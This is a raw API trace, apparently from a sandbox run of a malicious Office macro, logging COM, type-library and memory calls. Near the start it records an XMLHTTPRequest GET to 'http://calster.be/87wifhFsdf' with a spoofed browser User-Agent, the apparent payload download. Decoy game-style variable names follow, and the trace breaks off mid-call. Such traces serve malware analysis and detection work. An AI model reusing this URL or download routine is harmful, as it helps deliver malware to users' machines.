ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4070, pDummy=0x0 | out: ppTypeAttr=0x2e4070, pDummy=0x0) returned 0x0 [0033.270] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.270] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.270] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e42b0, pDummy=0x0 | out: ppTypeAttr=0x2e42b0, pDummy=0x0) returned 0x0 [0033.270] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.270] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.270] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3fd0, pDummy=0x0 | out: ppTypeAttr=0x2e3fd0, pDummy=0x0) returned 0x0 [0033.270] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.270] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.270] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e4210, pDummy=0x0 | out: ppTypeAttr=0x2e4210, pDummy=0x0) returned 0x0 [0033.270] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.271] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.271] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3fd0, pDummy=0x0 | out: ppTypeAttr=0x2e3fd0, pDummy=0x0) returned 0x0 [0033.271] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.271] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.271] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1f98, ppTypeAttr=0x2e4210, pDummy=0x0 | out: ppTypeAttr=0x2e4210, pDummy=0x0) returned 0x0 [0033.271] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1f98) returned 0x0 [0033.271] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5fd0) [0033.272] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0xb4049e8 | out: ppsaOut=0xb4049e8) returned 0x0 [0033.272] SafeArrayAllocData (psa=0x75dc900) returned 0x0 [0033.272] XMLHTTPRequest:IUnknown:AddRef (This=0xaba5aa0) returned 0x2 [0033.276] IDispatch:GetIDsOfNames (in: This=0xaba5aa0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e5d70*="Open", cNames=0x1, lcid=0x2e900000409, rgDispId=0x2e5c60 | out: rgDispId=0x2e5c60*=1) returned 0x0 [0033.286] IDispatch:Invoke (in: This=0xaba5aa0, dispIdMember=1, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e5c78*(rgvarg=([0]=0xb4e42a0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0xb4e42b8*(varType=0x4008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7801640*="http://calster.be/87wifhFsdf", varVal2=0x0), [2]=0xb4e42d0*(varType=0x4008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x77761d8*="GeT", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x2e5c98, pExcepInfo=0x2e5d00, puArgErr=0x0 | out: pDispParams=0x2e5c78*(rgvarg=([0]=0xb4e42a0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0xb4e42b8*(varType=0x4008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7801640*="http://calster.be/87wifhFsdf", varVal2=0x0), [2]=0xb4e42d0*(varType=0x4008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x77761d8*="GeT", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x2e5c98*(varType=0x0, wReserved1=0xe36e, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x0, varVal2=0x7fee372f92e), pExcepInfo=0x2e5d00*(wCode=0x48, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile="뜏Ƀꥦ 蔏ჲ\x01쀳譈⑼䠠岋〤荈⣄郃邐邐䢐岉ࠤ㍅曒즅萏", dwHelpContext=0x2, pvReserved=0x75dc900, pfnDeferredFillIn=0xb4049f8, scode=0xe33555c8), puArgErr=0x0) returned 0x0 [0033.370] SafeArrayDestroyData (psa=0x75dc900) returned 0x0 [0033.370] SafeArrayDestroyDescriptor (psa=0x75dc900) returned 0x0 [0033.370] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0xb4049e8 | out: ppsaOut=0xb4049e8) returned 0x0 [0033.370] SafeArrayAllocData (psa=0x75dc900) returned 0x0 [0033.370] XMLHTTPRequest:IUnknown:AddRef (This=0xaba5aa0) returned 0x2 [0033.370] IDispatch:GetIDsOfNames (in: This=0xaba5aa0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e5d70*="setRequestHeader", cNames=0x1, lcid=0xdf400000409, rgDispId=0x2e5c60 | out: rgDispId=0x2e5c60*=2) returned 0x0 [0033.370] IDispatch:Invoke (in: This=0xaba5aa0, dispIdMember=2, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e5c78*(rgvarg=([0]=0x727b060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0", varVal2=0x0), [1]=0x727b078*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x2e5c98, pExcepInfo=0x2e5d00, puArgErr=0x0 | out: pDispParams=0x2e5c78*(rgvarg=([0]=0x727b060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0", varVal2=0x0), [1]=0x727b078*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x2e5c98*(varType=0x0, wReserved1=0xfde6, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x0, varVal2=0xb404a08), pExcepInfo=0x2e5d00*(wCode=0x30, wReserved=0x0, bstrSource=0x0, bstrDescription="", bstrHelpFile="譈䣸፵캋蕈࿀↟䠀킋Ꮸ", dwHelpContext=0xb500c0c, pvReserved=0x2e5ef0, pfnDeferredFillIn=0x14, scode=0xb404898), puArgErr=0x0) returned 0x0 [0033.370] SafeArrayDestroyData (psa=0x75dc900) returned 0x0 [0033.370] SafeArrayDestroyDescriptor (psa=0x75dc900) returned 0x0 [0033.370] XMLHTTPRequest:IUnknown:AddRef (This=0xaba5aa0) returned 0x2 [0033.370] IDispatch:GetIDsOfNames (in: This=0xaba5aa0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e6030*="Send", cNames=0x1, lcid=0x50045100000409, rgDispId=0x2e5f20 | out: rgDispId=0x2e5f20*=5) returned 0x0 [0033.370] IDispatch:Invoke (in: This=0xaba5aa0, dispIdMember=5, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e5f38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2e5f58, pExcepInfo=0x2e5fc0, puArgErr=0x0 | out: pDispParams=0x2e5f38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2e5f58*(varType=0x0, wReserved1=0xb63, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xb404a20), pExcepInfo=0x2e5fc0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile="뜏Ƀꥦ 蔏ჲ\x01쀳譈⑼䠠岋〤荈⣄郃邐邐䢐岉ࠤ㍅曒즅萏", dwHelpContext=0x2, pvReserved=0x75dc900, pfnDeferredFillIn=0xb5ce490, scode=0xfd621377), puArgErr=0x0) returned 0x0 [0033.599] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0033.599] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0033.599] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0033.599] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0033.599] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0033.599] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0033.599] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0033.599] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0033.599] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0033.599] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0033.600] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x1c, wParam=0x0, lParam=0xb1c) returned 0x0 [0045.466] SafeArrayDestroyData (psa=0x75dc900) returned 0x0 [0045.466] SafeArrayDestroyDescriptor (psa=0x75dc900) returned 0x0 [0045.466] IDispatch:GetIDsOfNames (in: This=0xaba5aa0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e61c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x2e61a4 | out: rgDispId=0x2e61a4*=7) returned 0x0 [0045.466] IDispatch:Invoke (in: This=0xaba5aa0, dispIdMember=7, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x2e6158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xb405038, pExcepInfo=0x2e6170, puArgErr=0x2e6150 | out: pDispParams=0x2e6158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xb405038*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x2e6170*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2e6150*=0x409) returned 0x0 [0045.466] VarCmp (pvarLeft=0xb405038, pvarRight=0xb404fa0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0045.466] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Speed") returned 0x10c7a6 [0045.466] IUnknown:AddRef (This=0x782a220) returned 0x1b [0045.466] IUnknown:Release (This=0x782a220) returned 0x1a [0045.466] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Player") returned 0x10d5f4 [0045.466] IUnknown:AddRef (This=0x782a220) returned 0x1b [0045.466] IUnknown:Release (This=0x782a220) returned 0x1a [0045.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.466] wcscpy_s (in: _Destination=0xb5c8950, _SizeInWords=0x2, _Source="S" | out: _Destination="S") returned 0x0 [0045.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a602b6, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="FlagWho") returned 0 [0045.466] wcscpy_s (in: _Destination=0xb5c8960, _SizeInWords=0x8, _Source="FlagWho" | out: _Destination="FlagWho") returned 0x0 [0045.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a602de, cbMultiByte=10, lpWideCharStr=0x2e4560, cchWideChar=9 | out: lpWideCharStr="DevCheat") returned 0 [0045.467] wcscpy_s (in: _Destination=0xb5c8708, _SizeInWords=0x9, _Source="DevCheat" | out: _Destination="DevCheat") returned 0x0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6030a, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="Mode") returned 0 [0045.467] wcscpy_s (in: _Destination=0xb5c8470, _SizeInWords=0x5, _Source="Mode" | out: _Destination="Mode") returned 0x0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60332, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="Ship") returned 0 [0045.467] wcscpy_s (in: _Destination=0xb5c8488, _SizeInWords=0x5, _Source="Ship" | out: _Destination="Ship") returned 0x0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.467] wcscpy_s (in: _Destination=0xb5c84a0, _SizeInWords=0x6, _Source="KeyIs" | out: _Destination="KeyIs") returned 0x0 [0045.467] ITypeInfo:LocalReleaseVarDesc (This=0x784d1b0) returned 0x0 [0045.467] IUnknown:QueryInterface (in: This=0x784d1b0, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47b0 | out: ppvObject=0x2e47b0*=0x0) returned 0x80004002 [0045.467] IUnknown:QueryInterface (in: This=0x784d1b0, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4780 | out: ppvObject=0x2e4780*=0x0) returned 0x80004002 [0045.467] IUnknown:QueryInterface (in: This=0x784d1b0, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4770 | out: ppvObject=0x2e4770*=0x0) returned 0x80004002 [0045.467] IUnknown:QueryInterface (in: This=0x784d1b0, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4778 | out: ppvObject=0x2e4778*=0x0) returned 0x80004002 [0045.467] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d1b0, ppTypeAttr=0x2e47a8, pDummy=0x10 | out: ppTypeAttr=0x2e47a8, pDummy=0x10) returned 0x0 [0045.467] ITypeInfo:LocalReleaseTypeAttr (This=0x784d1b0) returned 0x0 [0045.467] IUnknown:AddRef (This=0x784d1b0) returned 0x3 [0045.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aLEFT2") returned 0x10cfaa [0045.467] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x7, _Src="aLEFT2" | out: _Dst="aLEFT2") returned 0x0 [0045.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=7, lpWideCharStr=0x2e44f0, cchWideChar=7 | out: lpWideCharStr="aLEFT2") returned 7 [0045.467] IUnknown:AddRef (This=0x782a220) returned 0x1d [0045.467] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="aLEFT2", lHashVal=0x10cfaa, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.467] IUnknown:Release (This=0x782a220) returned 0x1c [0045.467] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.467] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="aLEFT2", lHashVal=0x10cfaa, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.467] IUnknown:Release (This=0x731da90) returned 0x15 [0045.467] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.467] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="aLEFT2", lHashVal=0x10cfaa, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.467] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.467] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.467] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="aLEFT2", lHashVal=0x10cfaa, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.467] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.468] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0x72f72a0 [0045.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aLEFT2") returned 0x104a14 [0045.468] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xe, _Src="_B_var_aLEFT2" | out: _Dst="_B_var_aLEFT2") returned 0x0 [0045.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=14, lpWideCharStr=0x2e46a0, cchWideChar=14 | out: lpWideCharStr="_B_var_aLEFT2") returned 14 [0045.468] IUnknown:AddRef (This=0x782a220) returned 0x1d [0045.468] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_aLEFT2", lHashVal=0x104a14, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.468] IUnknown:Release (This=0x782a220) returned 0x1c [0045.468] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.468] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_aLEFT2", lHashVal=0x104a14, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.468] IUnknown:Release (This=0x731da90) returned 0x15 [0045.468] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.468] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_aLEFT2", lHashVal=0x104a14, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.468] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.468] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.468] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_aLEFT2", lHashVal=0x104a14, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.468] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.468] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.468] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_aLEFT2", lHashVal=0x104a14, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.468] IUnknown:Release (This=0x782b300) returned 0x6 [0045.468] IUnknown:AddRef (This=0x782a220) returned 0x1d [0045.468] IUnknown:Release (This=0x782a220) returned 0x1c [0045.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a603ae, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="animY") returned 0 [0045.468] wcscpy_s (in: _Destination=0xb5c84b8, _SizeInWords=0x6, _Source="animY" | out: _Destination="animY") returned 0x0 [0045.468] ITypeInfo:LocalReleaseVarDesc (This=0x784d1b0) returned 0x0 [0045.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aUP2") returned 0x10543e [0045.468] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x5, _Src="aUP2" | out: _Dst="aUP2") returned 0x0 [0045.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=5, lpWideCharStr=0x2e44f0, cchWideChar=5 | out: lpWideCharStr="aUP2") returned 5 [0045.468] IUnknown:AddRef (This=0x782a220) returned 0x1e [0045.468] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="aUP2", lHashVal=0x10543e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.468] IUnknown:Release (This=0x782a220) returned 0x1d [0045.468] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.468] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="aUP2", lHashVal=0x10543e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.469] IUnknown:Release (This=0x731da90) returned 0x15 [0045.469] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.469] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="aUP2", lHashVal=0x10543e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.469] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.469] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.469] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="aUP2", lHashVal=0x10543e, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.469] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.469] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0x72f72a0 [0045.469] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aUP2") returned 0x10b9aa [0045.469] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xc, _Src="_B_var_aUP2" | out: _Dst="_B_var_aUP2") returned 0x0 [0045.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=12, lpWideCharStr=0x2e46a0, cchWideChar=12 | out: lpWideCharStr="_B_var_aUP2") returned 12 [0045.469] IUnknown:AddRef (This=0x782a220) returned 0x1e [0045.469] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_aUP2", lHashVal=0x10b9aa, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.469] IUnknown:Release (This=0x782a220) returned 0x1d [0045.469] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.469] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_aUP2", lHashVal=0x10b9aa, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.469] IUnknown:Release (This=0x731da90) returned 0x15 [0045.469] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.469] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_aUP2", lHashVal=0x10b9aa, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.469] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.469] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.469] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_aUP2", lHashVal=0x10b9aa, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.469] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.469] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.469] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_aUP2", lHashVal=0x10b9aa, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.469] IUnknown:Release (This=0x782b300) returned 0x6 [0045.469] IUnknown:AddRef (This=0x782a220) returned 0x1e [0045.469] IUnknown:Release (This=0x782a220) returned 0x1d [0045.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a603ae, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="animY") returned 0 [0045.469] ITypeInfo:LocalReleaseVarDesc (This=0x784d1b0) returned 0x0 [0045.469] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aRIGHT2") returned 0x105ee7 [0045.469] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x8, _Src="aRIGHT2" | out: _Dst="aRIGHT2") returned 0x0 [0045.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=8, lpWideCharStr=0x2e44f0, cchWideChar=8 | out: lpWideCharStr="aRIGHT2") returned 8 [0045.469] IUnknown:AddRef (This=0x782a220) returned 0x1f [0045.469] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="aRIGHT2", lHashVal=0x105ee7, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.469] IUnknown:Release (This=0x782a220) returned 0x1e [0045.469] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.469] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="aRIGHT2", lHashVal=0x105ee7, pfName=0x2e45c0, 